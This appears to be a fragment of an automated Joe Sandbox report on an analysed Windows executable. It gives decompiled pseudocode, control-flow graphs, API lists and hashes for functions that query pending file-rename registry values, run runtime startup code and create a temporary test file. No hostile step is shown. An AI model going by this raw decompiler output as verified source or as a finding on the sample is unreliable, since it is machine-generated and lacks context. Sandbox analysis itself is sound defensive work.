                                                                                                                                                                                                        control_flow_graph 563 c256d-c257d 564 c2622-c2627 call c24e0 563->564 565 c2583-c2589 563->565 572 c2629-c262f 564->572 567 c25e8-c2607 RegOpenKeyExA 565->567 568 c258b 565->568 569 c2609-c2620 RegQueryInfoKeyA 567->569 570 c25e3-c25e6 567->570 568->572 573 c2591-c2595 568->573 574 c25d1-c25dd RegCloseKey 569->574 570->572 573->572 575 c259b-c25ba RegOpenKeyExA 573->575 574->570 575->570 576 c25bc-c25cb RegQueryValueExA 575->576 576->574
                                                                                                                                                                                                        C-Code - Quality: 86%
                                                                                                                                                                                                        			E000C256D(signed int __ecx) {
                                                                                                                                                                                                        				int _v8;
                                                                                                                                                                                                        				void* _v12;
                                                                                                                                                                                                        				signed int _t13;
                                                                                                                                                                                                        				signed int _t19;
                                                                                                                                                                                                        				long _t24;
                                                                                                                                                                                                        				void* _t26;
                                                                                                                                                                                                        				int _t31;
                                                                                                                                                                                                        				void* _t34;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_push(__ecx);
                                                                                                                                                                                                        				_push(__ecx);
                                                                                                                                                                                                        				_t13 = __ecx & 0x0000ffff;
                                                                                                                                                                                                        				_t31 = 0;
                                                                                                                                                                                                        				if(_t13 == 0) {
                                                                                                                                                                                                        					_t31 = E000C24E0(_t26);
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t34 = _t13 - 1;
                                                                                                                                                                                                        					if(_t34 == 0) {
                                                                                                                                                                                                        						_v8 = 0;
                                                                                                                                                                                                        						if(RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager\\FileRenameOperations", 0, 0x20019,  &_v12) != 0) {
                                                                                                                                                                                                        							goto L7;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_t19 = RegQueryInfoKeyA(_v12, 0, 0, 0, 0, 0, 0,  &_v8, 0, 0, 0, 0);
                                                                                                                                                                                                        							goto L6;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						L12:
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						if(_t34 > 0 && __ecx <= 3) {
                                                                                                                                                                                                        							_v8 = 0;
                                                                                                                                                                                                        							_t24 = RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager", 0, 0x20019,  &_v12); // executed
                                                                                                                                                                                                        							if(_t24 == 0) {
                                                                                                                                                                                                        								_t19 = RegQueryValueExA(_v12, "PendingFileRenameOperations", 0, 0, 0,  &_v8); // executed
                                                                                                                                                                                                        								L6:
                                                                                                                                                                                                        								asm("sbb eax, eax");
                                                                                                                                                                                                        								_v8 = _v8 &  !( ~_t19);
                                                                                                                                                                                                        								RegCloseKey(_v12); // executed
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							L7:
                                                                                                                                                                                                        							_t31 = _v8;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return _t31;
                                                                                                                                                                                                        				goto L12;
                                                                                                                                                                                                        			}











                                                                                                                                                                                                        0x000c2572
                                                                                                                                                                                                        0x000c2573
                                                                                                                                                                                                        0x000c2575
                                                                                                                                                                                                        0x000c2578
                                                                                                                                                                                                        0x000c257d
                                                                                                                                                                                                        0x000c2627
                                                                                                                                                                                                        0x000c2583
                                                                                                                                                                                                        0x000c2586
                                                                                                                                                                                                        0x000c2589
                                                                                                                                                                                                        0x000c25eb
                                                                                                                                                                                                        0x000c2607
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c2609
                                                                                                                                                                                                        0x000c261a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c261a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c258b
                                                                                                                                                                                                        0x000c258b
                                                                                                                                                                                                        0x000c259e
                                                                                                                                                                                                        0x000c25b2
                                                                                                                                                                                                        0x000c25ba
                                                                                                                                                                                                        0x000c25cb
                                                                                                                                                                                                        0x000c25d1
                                                                                                                                                                                                        0x000c25d6
                                                                                                                                                                                                        0x000c25da
                                                                                                                                                                                                        0x000c25dd
                                                                                                                                                                                                        0x000c25dd
                                                                                                                                                                                                        0x000c25e3
                                                                                                                                                                                                        0x000c25e3
                                                                                                                                                                                                        0x000c25e3
                                                                                                                                                                                                        0x000c258b
                                                                                                                                                                                                        0x000c2589
                                                                                                                                                                                                        0x000c262f
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Control\Session Manager,00000000,00020019,?,00000000,000C4096,000C4096,?,000C1ED3,00000001,00000000,?,?,000C4137,?), ref: 000C25B2
                                                                                                                                                                                                        • RegQueryValueExA.KERNELBASE(?,PendingFileRenameOperations,00000000,00000000,00000000,000C4096,?,000C1ED3,00000001,00000000,?,?,000C4137,?,000C4096), ref: 000C25CB
                                                                                                                                                                                                        • RegCloseKey.KERNELBASE(?,?,000C1ED3,00000001,00000000,?,?,000C4137,?,000C4096), ref: 000C25DD
                                                                                                                                                                                                        • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Session Manager\FileRenameOperations,00000000,00020019,?,00000000,000C4096,000C4096,?,000C1ED3,00000001,00000000,?,?,000C4137,?), ref: 000C25FF
                                                                                                                                                                                                        • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,000C4096,00000000,00000000,00000000,00000000,?,000C1ED3,00000001,00000000), ref: 000C261A
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • System\CurrentControlSet\Control\Session Manager, xrefs: 000C25A8
                                                                                                                                                                                                        • PendingFileRenameOperations, xrefs: 000C25C3
                                                                                                                                                                                                        • System\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 000C25F5
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.422517102.00000000000C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000C0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.422505692.00000000000C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422529324.00000000000C8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_c0000_szV94FU13.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: OpenQuery$CloseInfoValue
                                                                                                                                                                                                        • String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
                                                                                                                                                                                                        • API String ID: 2209512893-559176071
                                                                                                                                                                                                        • Opcode ID: 0ab2daed166f89eb01e6190e5de66f029dbe657ff97a1383263263b6f1411af8
                                                                                                                                                                                                        • Instruction ID: 0ff3d9c55e2d4ef23f7ae9e729aedbadef39a03dce0037cf10b8230474b844c9
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0ab2daed166f89eb01e6190e5de66f029dbe657ff97a1383263263b6f1411af8
                                                                                                                                                                                                        • Instruction Fuzzy Hash: FE114235A42228FBAB20DB919C0DFFFBEBCEF057A5F214059B909A2111DA345E44D6A1
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 577 c6a60-c6a91 call c7155 call c7208 GetStartupInfoW 583 c6a93-c6aa2 577->583 584 c6abc-c6abe 583->584 585 c6aa4-c6aa6 583->585 586 c6abf-c6ac5 584->586 587 c6aaf-c6aba Sleep 585->587 588 c6aa8-c6aad 585->588 589 c6ac7-c6acf _amsg_exit 586->589 590 c6ad1-c6ad7 586->590 587->583 588->586 591 c6b0b-c6b11 589->591 592 c6ad9-c6ae9 call c6c3f 590->592 593 c6b05 590->593 595 c6b2e-c6b30 591->595 596 c6b13-c6b24 _initterm 591->596 597 c6aee-c6af2 592->597 593->591 598 c6b3b-c6b42 595->598 599 c6b32-c6b39 595->599 596->595 597->591 600 c6af4-c6b00 597->600 601 c6b44-c6b51 call c7060 598->601 602 c6b67-c6b71 598->602 599->598 604 c6c39-c6c3e call c724d 600->604 601->602 610 c6b53-c6b65 601->610 603 c6b74-c6b79 602->603 607 c6b7b-c6b7d 603->607 608 c6bc5-c6bc8 603->608 614 c6b7f-c6b81 607->614 615 c6b94-c6b98 607->615 612 c6bca-c6bd3 608->612 613 c6bd6-c6be3 _ismbblead 608->613 610->602 612->613 616 c6be9-c6bed 613->616 617 c6be5-c6be6 613->617 614->608 618 c6b83-c6b85 614->618 619 c6b9a-c6b9e 615->619 620 c6ba0-c6ba2 615->620 616->603 622 c6c1e-c6c25 616->622 617->616 618->615 623 c6b87-c6b8a 618->623 624 c6ba3-c6bbc call c2bfb 619->624 620->624 626 c6c27-c6c2d _cexit 622->626 627 c6c32 622->627 623->615 625 c6b8c-c6b92 623->625 624->622 630 c6bbe-c6bbf exit 624->630 625->618 626->627 627->604 630->608
                                                                                                                                                                                                        C-Code - Quality: 51%
                                                                                                                                                                                                        			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                                        				signed int* _t25;
                                                                                                                                                                                                        				signed int _t26;
                                                                                                                                                                                                        				signed int _t29;
                                                                                                                                                                                                        				int _t30;
                                                                                                                                                                                                        				signed int _t37;
                                                                                                                                                                                                        				signed char _t41;
                                                                                                                                                                                                        				signed int _t53;
                                                                                                                                                                                                        				signed int _t54;
                                                                                                                                                                                                        				intOrPtr _t56;
                                                                                                                                                                                                        				signed int _t58;
                                                                                                                                                                                                        				signed int _t59;
                                                                                                                                                                                                        				intOrPtr* _t60;
                                                                                                                                                                                                        				void* _t62;
                                                                                                                                                                                                        				void* _t67;
                                                                                                                                                                                                        				void* _t68;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				E000C7155();
                                                                                                                                                                                                        				_push(0x58);
                                                                                                                                                                                                        				_push(0xc72b8);
                                                                                                                                                                                                        				E000C7208(__ebx, __edi, __esi);
                                                                                                                                                                                                        				 *(_t62 - 0x20) = 0;
                                                                                                                                                                                                        				GetStartupInfoW(_t62 - 0x68);
                                                                                                                                                                                                        				 *((intOrPtr*)(_t62 - 4)) = 0;
                                                                                                                                                                                                        				_t56 =  *((intOrPtr*)( *[fs:0x18] + 4));
                                                                                                                                                                                                        				_t53 = 0;
                                                                                                                                                                                                        				while(1) {
                                                                                                                                                                                                        					asm("lock cmpxchg [edx], ecx");
                                                                                                                                                                                                        					if(0 == 0) {
                                                                                                                                                                                                        						break;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					if(0 != _t56) {
                                                                                                                                                                                                        						Sleep(0x3e8);
                                                                                                                                                                                                        						continue;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_t58 = 1;
                                                                                                                                                                                                        						_t53 = 1;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					L7:
                                                                                                                                                                                                        					_t67 =  *0xc88b0 - _t58; // 0x2
                                                                                                                                                                                                        					if(_t67 != 0) {
                                                                                                                                                                                                        						__eflags =  *0xc88b0; // 0x2
                                                                                                                                                                                                        						if(__eflags != 0) {
                                                                                                                                                                                                        							 *0xc81e4 = _t58;
                                                                                                                                                                                                        							goto L13;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							 *0xc88b0 = _t58;
                                                                                                                                                                                                        							_t37 = E000C6C3F(0xc10b8, 0xc10c4); // executed
                                                                                                                                                                                                        							__eflags = _t37;
                                                                                                                                                                                                        							if(__eflags == 0) {
                                                                                                                                                                                                        								goto L13;
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                                                                                                                                                                                                        								_t30 = 0xff;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_push(0x1f);
                                                                                                                                                                                                        						L000C6FF4();
                                                                                                                                                                                                        						L13:
                                                                                                                                                                                                        						_t68 =  *0xc88b0 - _t58; // 0x2
                                                                                                                                                                                                        						if(_t68 == 0) {
                                                                                                                                                                                                        							_push(0xc10b4);
                                                                                                                                                                                                        							_push(0xc10ac);
                                                                                                                                                                                                        							L000C7202();
                                                                                                                                                                                                        							 *0xc88b0 = 2;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						if(_t53 == 0) {
                                                                                                                                                                                                        							 *0xc88ac = 0;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t71 =  *0xc88b4;
                                                                                                                                                                                                        						if( *0xc88b4 != 0 && E000C7060(_t71, 0xc88b4) != 0) {
                                                                                                                                                                                                        							_t60 =  *0xc88b4; // 0x0
                                                                                                                                                                                                        							 *0xca288(0, 2, 0);
                                                                                                                                                                                                        							 *_t60();
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t25 = __imp___acmdln; // 0x76235b9c
                                                                                                                                                                                                        						_t59 =  *_t25;
                                                                                                                                                                                                        						 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                        						_t54 =  *(_t62 - 0x20);
                                                                                                                                                                                                        						while(1) {
                                                                                                                                                                                                        							_t41 =  *_t59;
                                                                                                                                                                                                        							if(_t41 > 0x20) {
                                                                                                                                                                                                        								goto L32;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							if(_t41 != 0) {
                                                                                                                                                                                                        								if(_t54 != 0) {
                                                                                                                                                                                                        									goto L32;
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									while(_t41 != 0 && _t41 <= 0x20) {
                                                                                                                                                                                                        										_t59 = _t59 + 1;
                                                                                                                                                                                                        										 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                        										_t41 =  *_t59;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							__eflags =  *(_t62 - 0x3c) & 0x00000001;
                                                                                                                                                                                                        							if(( *(_t62 - 0x3c) & 0x00000001) == 0) {
                                                                                                                                                                                                        								_t29 = 0xa;
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								_t29 =  *(_t62 - 0x38) & 0x0000ffff;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_push(_t29);
                                                                                                                                                                                                        							_t30 = E000C2BFB(0xc0000, 0, _t59); // executed
                                                                                                                                                                                                        							 *0xc81e0 = _t30;
                                                                                                                                                                                                        							__eflags =  *0xc81f8;
                                                                                                                                                                                                        							if( *0xc81f8 == 0) {
                                                                                                                                                                                                        								exit(_t30); // executed
                                                                                                                                                                                                        								goto L32;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							__eflags =  *0xc81e4;
                                                                                                                                                                                                        							if( *0xc81e4 == 0) {
                                                                                                                                                                                                        								__imp___cexit();
                                                                                                                                                                                                        								_t30 =  *0xc81e0; // 0x80070002
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                                                                                                                                                                                                        							goto L40;
                                                                                                                                                                                                        							L32:
                                                                                                                                                                                                        							__eflags = _t41 - 0x22;
                                                                                                                                                                                                        							if(_t41 == 0x22) {
                                                                                                                                                                                                        								__eflags = _t54;
                                                                                                                                                                                                        								_t15 = _t54 == 0;
                                                                                                                                                                                                        								__eflags = _t15;
                                                                                                                                                                                                        								_t54 = 0 | _t15;
                                                                                                                                                                                                        								 *(_t62 - 0x20) = _t54;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t26 = _t41 & 0x000000ff;
                                                                                                                                                                                                        							__imp___ismbblead(_t26);
                                                                                                                                                                                                        							__eflags = _t26;
                                                                                                                                                                                                        							if(_t26 != 0) {
                                                                                                                                                                                                        								_t59 = _t59 + 1;
                                                                                                                                                                                                        								__eflags = _t59;
                                                                                                                                                                                                        								 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t59 = _t59 + 1;
                                                                                                                                                                                                        							 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					L40:
                                                                                                                                                                                                        					return E000C724D(_t30);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t58 = 1;
                                                                                                                                                                                                        				__eflags = 1;
                                                                                                                                                                                                        				goto L7;
                                                                                                                                                                                                        			}


















                                                                                                                                                                                                        0x000c6a60
                                                                                                                                                                                                        0x000c6a6a
                                                                                                                                                                                                        0x000c6a6c
                                                                                                                                                                                                        0x000c6a71
                                                                                                                                                                                                        0x000c6a78
                                                                                                                                                                                                        0x000c6a7f
                                                                                                                                                                                                        0x000c6a85
                                                                                                                                                                                                        0x000c6a8e
                                                                                                                                                                                                        0x000c6a91
                                                                                                                                                                                                        0x000c6a93
                                                                                                                                                                                                        0x000c6a9c
                                                                                                                                                                                                        0x000c6aa2
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c6aa6
                                                                                                                                                                                                        0x000c6ab4
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c6aa8
                                                                                                                                                                                                        0x000c6aaa
                                                                                                                                                                                                        0x000c6aab
                                                                                                                                                                                                        0x000c6aab
                                                                                                                                                                                                        0x000c6abf
                                                                                                                                                                                                        0x000c6abf
                                                                                                                                                                                                        0x000c6ac5
                                                                                                                                                                                                        0x000c6ad1
                                                                                                                                                                                                        0x000c6ad7
                                                                                                                                                                                                        0x000c6b05
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c6ad9
                                                                                                                                                                                                        0x000c6ad9
                                                                                                                                                                                                        0x000c6ae9
                                                                                                                                                                                                        0x000c6af0
                                                                                                                                                                                                        0x000c6af2
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c6af4
                                                                                                                                                                                                        0x000c6af4
                                                                                                                                                                                                        0x000c6afb
                                                                                                                                                                                                        0x000c6afb
                                                                                                                                                                                                        0x000c6af2
                                                                                                                                                                                                        0x000c6ac7
                                                                                                                                                                                                        0x000c6ac7
                                                                                                                                                                                                        0x000c6ac9
                                                                                                                                                                                                        0x000c6b0b
                                                                                                                                                                                                        0x000c6b0b
                                                                                                                                                                                                        0x000c6b11
                                                                                                                                                                                                        0x000c6b13
                                                                                                                                                                                                        0x000c6b18
                                                                                                                                                                                                        0x000c6b1d
                                                                                                                                                                                                        0x000c6b24
                                                                                                                                                                                                        0x000c6b24
                                                                                                                                                                                                        0x000c6b30
                                                                                                                                                                                                        0x000c6b39
                                                                                                                                                                                                        0x000c6b39
                                                                                                                                                                                                        0x000c6b3b
                                                                                                                                                                                                        0x000c6b42
                                                                                                                                                                                                        0x000c6b57
                                                                                                                                                                                                        0x000c6b5f
                                                                                                                                                                                                        0x000c6b65
                                                                                                                                                                                                        0x000c6b65
                                                                                                                                                                                                        0x000c6b67
                                                                                                                                                                                                        0x000c6b6c
                                                                                                                                                                                                        0x000c6b6e
                                                                                                                                                                                                        0x000c6b71
                                                                                                                                                                                                        0x000c6b74
                                                                                                                                                                                                        0x000c6b74
                                                                                                                                                                                                        0x000c6b79
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c6b7d
                                                                                                                                                                                                        0x000c6b81
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c6b83
                                                                                                                                                                                                        0x000c6b8c
                                                                                                                                                                                                        0x000c6b8d
                                                                                                                                                                                                        0x000c6b90
                                                                                                                                                                                                        0x000c6b90
                                                                                                                                                                                                        0x000c6b83
                                                                                                                                                                                                        0x000c6b81
                                                                                                                                                                                                        0x000c6b94
                                                                                                                                                                                                        0x000c6b98
                                                                                                                                                                                                        0x000c6ba2
                                                                                                                                                                                                        0x000c6b9a
                                                                                                                                                                                                        0x000c6b9a
                                                                                                                                                                                                        0x000c6b9a
                                                                                                                                                                                                        0x000c6ba3
                                                                                                                                                                                                        0x000c6bab
                                                                                                                                                                                                        0x000c6bb0
                                                                                                                                                                                                        0x000c6bb5
                                                                                                                                                                                                        0x000c6bbc
                                                                                                                                                                                                        0x000c6bbf
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c6bbf
                                                                                                                                                                                                        0x000c6c1e
                                                                                                                                                                                                        0x000c6c25
                                                                                                                                                                                                        0x000c6c27
                                                                                                                                                                                                        0x000c6c2d
                                                                                                                                                                                                        0x000c6c2d
                                                                                                                                                                                                        0x000c6c32
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c6bc5
                                                                                                                                                                                                        0x000c6bc5
                                                                                                                                                                                                        0x000c6bc8
                                                                                                                                                                                                        0x000c6bcc
                                                                                                                                                                                                        0x000c6bce
                                                                                                                                                                                                        0x000c6bce
                                                                                                                                                                                                        0x000c6bd1
                                                                                                                                                                                                        0x000c6bd3
                                                                                                                                                                                                        0x000c6bd3
                                                                                                                                                                                                        0x000c6bd6
                                                                                                                                                                                                        0x000c6bda
                                                                                                                                                                                                        0x000c6be1
                                                                                                                                                                                                        0x000c6be3
                                                                                                                                                                                                        0x000c6be5
                                                                                                                                                                                                        0x000c6be5
                                                                                                                                                                                                        0x000c6be6
                                                                                                                                                                                                        0x000c6be6
                                                                                                                                                                                                        0x000c6be9
                                                                                                                                                                                                        0x000c6bea
                                                                                                                                                                                                        0x000c6bea
                                                                                                                                                                                                        0x000c6b74
                                                                                                                                                                                                        0x000c6c39
                                                                                                                                                                                                        0x000c6c3e
                                                                                                                                                                                                        0x000c6c3e
                                                                                                                                                                                                        0x000c6abe
                                                                                                                                                                                                        0x000c6abe
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 000C7155: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 000C7182
                                                                                                                                                                                                          • Part of subcall function 000C7155: GetCurrentProcessId.KERNEL32 ref: 000C7191
                                                                                                                                                                                                          • Part of subcall function 000C7155: GetCurrentThreadId.KERNEL32 ref: 000C719A
                                                                                                                                                                                                          • Part of subcall function 000C7155: GetTickCount.KERNEL32 ref: 000C71A3
                                                                                                                                                                                                          • Part of subcall function 000C7155: QueryPerformanceCounter.KERNEL32(?), ref: 000C71B8
                                                                                                                                                                                                        • GetStartupInfoW.KERNEL32(?,000C72B8,00000058), ref: 000C6A7F
                                                                                                                                                                                                        • Sleep.KERNEL32(000003E8), ref: 000C6AB4
                                                                                                                                                                                                        • _amsg_exit.MSVCRT ref: 000C6AC9
                                                                                                                                                                                                        • _initterm.MSVCRT ref: 000C6B1D
                                                                                                                                                                                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 000C6B49
                                                                                                                                                                                                        • exit.KERNELBASE ref: 000C6BBF
                                                                                                                                                                                                        • _ismbblead.MSVCRT ref: 000C6BDA
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.422517102.00000000000C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 000C0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.422505692.00000000000C0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422529324.00000000000C8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.422538740.00000000000CC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_c0000_szV94FU13.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Current$Time$CountCounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThreadTick_amsg_exit_initterm_ismbbleadexit
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 836923961-0
                                                                                                                                                                                                        • Opcode ID: 23e46a79e2f7b3e46b3b16a23f0997653c4581735c57637647b60390fb88c9c5
                                                                                                                                                                                                        • Instruction ID: 28461542bfaaf66d0d64f2b37188dfef5015198653df1e6a06022c90c744ce40
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 23e46a79e2f7b3e46b3b16a23f0997653c4581735c57637647b60390fb88c9c5
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4F41E271A443249FEB719B68DC05FAE77E4EB45720F24802EE941E7291CF7A4C81CB95
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 631 c58c8-c58d5 632 c58d8-c58dd 631->632 632->632 633 c58df-c58f1 LocalAlloc 632->633 634 c5919-c5959 call c1680 call c658a CreateFileA LocalFree 633->634 635 c58f3-c5901 call c44b9 633->635 638 c5906-c5910 call c6285 634->638 644 c595b-c596c CloseHandle GetFileAttributesA 634->644 635->638 645 c5912-c5918 638->645 644->638 646 c596e-c5970 644->646 646->638 647 c5972-c597b 646->647 647->645
                                                                                                                                                                                                        C-Code - Quality: 95%
                                                                                                                                                                                                        			E000C58C8(intOrPtr* __ecx) {
                                                                                                                                                                                                        				void* _v8;
                                                                                                                                                                                                        				intOrPtr _t6;
                                                                                                                                                                                                        				void* _t10;
                                                                                                                                                                                                        				void* _t12;
                                                                                                                                                                                                        				void* _t14;
                                                                                                                                                                                                        				signed char _t16;
                                                                                                                                                                                                        				void* _t20;
                                                                                                                                                                                                        				void* _t23;
                                                                                                                                                                                                        				intOrPtr* _t27;
                                                                                                                                                                                                        				CHAR* _t33;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_push(__ecx);
                                                                                                                                                                                                        				_t33 = __ecx;
                                                                                                                                                                                                        				_t27 = __ecx;
                                                                                                                                                                                                        				_t23 = __ecx + 1;
                                                                                                                                                                                                        				do {
                                                                                                                                                                                                        					_t6 =  *_t27;
                                                                                                                                                                                                        					_t27 = _t27 + 1;
                                                                                                                                                                                                        				} while (_t6 != 0);
                                                                                                                                                                                                        				_t36 = _t27 - _t23 + 0x14;
                                                                                                                                                                                                        				_t20 = LocalAlloc(0x40, _t27 - _t23 + 0x14);
                                                                                                                                                                                                        				if(_t20 != 0) {
                                                                                                                                                                                                        					E000C1680(_t20, _t36, _t33);
                                                                                                                                                                                                        					E000C658A(_t20, _t36, "TMP4351$.TMP");
                                                                                                                                                                                                        					_t10 = CreateFileA(_t20, 0x40000000, 0, 0, 1, 0x4000080, 0); // executed
                                                                                                                                                                                                        					_v8 = _t10;
                                                                                                                                                                                                        					LocalFree(_t20);
                                                                                                                                                                                                        					_t12 = _v8;
                                                                                                                                                                                                        					if(_t12 == 0xffffffff) {
                                                                                                                                                                                                        						goto L4;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						CloseHandle(_t12);
                                                                                                                                                                                                        						_t16 = GetFileAttributesA(_t33); // executed
                                                                                                                                                                                                        						if(_t16 == 0xffffffff || (_t16 & 0x00000010) == 0) {
                                                                                                                                                                                                        							goto L4;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							 *0xc9124 = 0;
                                                                                                                                                                                                        							_t14 = 1;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					E000C44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                        					L4:
                                                                                                                                                                                                        					 *0xc9124 = E000C6285();
                                                                                                                                                                                                        					_t14 = 0;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return _t14;
                                                                                                                                                                                                        			}













                                                                                                                                                                                                        0x000c58cd
                                                                                                                                                                                                        0x000c58d1
                                                                                                                                                                                                        0x000c58d3
                                                                                                                                                                                                        0x000c58d5
                                                                                                                                                                                                        0x000c58d8
                                                                                                                                                                                                        0x000c58d8
                                                                                                                                                                                                        0x000c58da
                                                                                                                                                                                                        0x000c58db
                                                                                                                                                                                                        0x000c58e1
                                                                                                                                                                                                        0x000c58ed
                                                                                                                                                                                                        0x000c58f1
                                                                                                                                                                                                        0x000c591e
                                                                                                                                                                                                        0x000c592c
                                                                                                                                                                                                        0x000c5943
                                                                                                                                                                                                        0x000c594a
                                                                                                                                                                                                        0x000c594d
                                                                                                                                                                                                        0x000c5953
                                                                                                                                                                                                        0x000c5959
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c595b
                                                                                                                                                                                                        0x000c595c
                                                                                                                                                                                                        0x000c5963
                                                                                                                                                                                                        0x000c596c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x000c5972
                                                                                                                                                                                                        0x000c5974
                                                                                                                                                                                                        0x000c597a
                                                                                                                                                                                                        0x000c597a
                                                                                                                                                                                                        0x000c596c
                                                                                                                                                                                                        0x000c58f3
                                                                                                                                                                                                        0x000c5901
                                                                                                                                                                                                        0x000c5906
                                                                                                                                                                                                        0x000c590b
                                                                                                                                                                                                        0x000c5910
                                                                                                                                                                                                        0x000c5910
